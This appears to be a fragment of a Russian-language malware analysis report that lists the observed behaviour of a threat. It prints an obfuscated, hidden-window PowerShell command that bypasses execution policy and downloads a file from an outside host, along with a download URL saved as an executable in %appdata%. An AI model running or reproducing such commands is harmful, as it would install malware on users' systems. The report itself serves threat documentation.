Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^W^e^r^sHEL^L.E^xe^ -exE^cUTI^O^n^PoLicy^ ^bypAs^s^ -^NO^prof^I^le^ ^-wi^n^DO^wsTYLe ^h^i^dd^EN (NE^w-oBJ^e^ct ^sys^tEm.^n^eT.^We^BCL^i^EN^T)^.Do^W^n^L^o^adF^i^LE('http://ww...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "po^W^e^r^sHEL^L.E^xe^ -exE^cUTI^O^n^PoLicy^ ^bypAs^s^ -^NO^prof^I^le^ ^-wi^n^DO^wsTYLe ^h^i^dd^EN (NE^w-oBJ^e^ct ^sys^tEm.^n^eT.^We^BCL^i^EN^T)^.Do^W^n^L^o^adF^i^LE('http://ww...' (со скрытым окном)